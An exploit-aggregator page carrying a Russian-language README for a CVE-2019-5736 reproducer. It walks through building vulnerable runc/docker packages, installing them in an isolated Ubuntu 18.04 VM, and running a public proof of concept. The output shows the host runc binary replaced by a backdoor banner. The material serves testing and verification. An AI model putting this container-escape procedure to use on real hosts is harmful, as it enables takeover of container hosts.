Sploitus

Exploit for cve-2019-5736-reproducer

kitploit · 2026-08-26

Exploit Code

MARKDOWN73 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TAKUMAK-CVE-2019-5736-REPRODUCER
# CVE-2019-5736 репродуктор

Это позволяет подтвердить, что RunC-CVE-2019-5736 работает в вашем экземпляре KVM.

## Обзор рабочего процесса

  * Соберите связанные пакеты `docker.io`, уязвимые для CVE-2019-5736, в этом репозитории
  * Запустите экземпляр KVM Ubuntu 18.04 на LXD
  * Установите уязвимые пакеты `*.deb` в виртуальной машине
  * Попробуйте процедуру, описанную в RunC-CVE-2019-5736



## Сборка уязвимых пакетов `*.deb`

root@kitploit:~
    
    
    $ docker-compose build --no-cache
    $ docker-compose run build
    

## Подготовка исходного архива RunC-CVE-2019-5736

root@kitploit:~
    
    
    $ git clone https://github.com/twistlock/RunC-CVE-2019-5736.git
    $ tar cjf RunC-CVE-2019-5736.tar.bz2 RunC-CVE-2019-5736
    

## Запуск экземпляра KVM Ubuntu 18.04 на LXD

root@kitploit:~
    
    
    $ lxc launch --vm images:ubuntu/18.04 test-cve-2019-5736 -c limits.cpu=4 -c limits.memory=4GB
    $ lxc file push deb/*.deb RunC-CVE-2019-5736.tar.bz2 test-cve-2019-5736/root/
    $ lxc exec test-cve-2019-5736 bash
    root@test-cve-2019-5736:~# sed -i -e '/bionic-updates/s/^/#/' -e '/bionic-security/s/^/#/' /etc/apt/sources.list
    root@test-cve-2019-5736:~# apt update
    root@test-cve-2019-5736:~# apt install iptables libltdl7
    root@test-cve-2019-5736:~# dpkg -i containerd_0.2.5-0ubuntu2_amd64.deb docker.io_17.12.1-0ubuntu6_amd64.deb runc_1.0.0~rc6+git20181203.96ec2177-0~ubuntu2_amd64.deb
    

Обратите внимание, что следует использовать `images:ubuntu/18.04` вместо `ubuntu:18.04`, потому что команда `lxc exec` не работает должным образом с последним.

## Воспроизведение RunC-CVE-2019-5736

root@kitploit:~
    
    
    $ lxc exec test-cve-2019-5736 bash
    root@test-cve-2019-5736:~# tar xf RunC-CVE-2019-5736.tar.bz2
    root@test-cve-2019-5736:~# cd RunC-CVE-2019-5736
    root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker build -t cve-2019-5736:exec_POC ./exec_POC
    root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
    92b965383f377419f3dad7cec45e468a4c4a83e82e11a2f2e0e23803016e2840
    root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker exec poc_ctr bash
    No help topic for '/usr/bin/bash'
    root@test-cve-2019-5736:~/RunC-CVE-2019-5736# /usr/bin/docker-runc
    
    **THE ALL NEW AND IMPROVED RUNC**
    
            [+] Your backdoor here ->
    
    root@test-cve-2019-5736:~/RunC-CVE-2019-5736# 
    

## Приложение

  * Коммит с исправлением: https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b